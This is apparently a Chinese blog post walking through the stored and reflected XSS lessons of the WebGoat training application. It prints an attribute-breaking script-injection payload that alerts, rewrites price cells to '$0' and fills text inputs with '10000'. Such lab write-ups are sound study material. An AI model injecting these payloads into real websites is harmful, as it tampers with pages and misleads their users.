现在的位置: 首页 > 综合 > 正文

WebGoat——XSS Attacks(part 2)

2012年08月13日 ⁄ 综合 ⁄ 共 953字 ⁄ 字号 评论关闭

1、存储型

脚本:><script>alert('just for fun')</script>


------------------------------------------------------------------------------------------------------------------------------------------------------------

2、反射型


题意:通过反射型XSS,修改页面数据来达到攻击的目的。

大哭有点难度,参考答案做的。。。)

代码如下

'><script>
alert('This kinda is called reflected XSS or First-Order XSS!');
for(i=0;i<=document.getElementsByTagName("td").length-1;i++)
{
	if(document.getElementsByTagName("td")[i].innerHTML.indexOf('$')>0)
	{
		document.getElementsByTagName("td")[i].innerHTML = '$0';<!--找到$符号,将$符号后面的值都替换为0-->
	}
};
for(i=0;i<=document.getElementsByTagName("input").length-1;i++)
{
	if(document.getElementsByTagName("input")[i].type=='text')
	{
		document.getElementsByTagName("input")[i].value='10000';<!--找到文本域(text),将文本域里的值都替换为10000-->
	}
};
</script>

效果:



第一个篡改,修改$后值为0,不知道为什么没有生效。。。原因还不晓得。。。。


------------------------------------------------------------------------------------------------------------------------------------------------------------





抱歉!评论已关闭.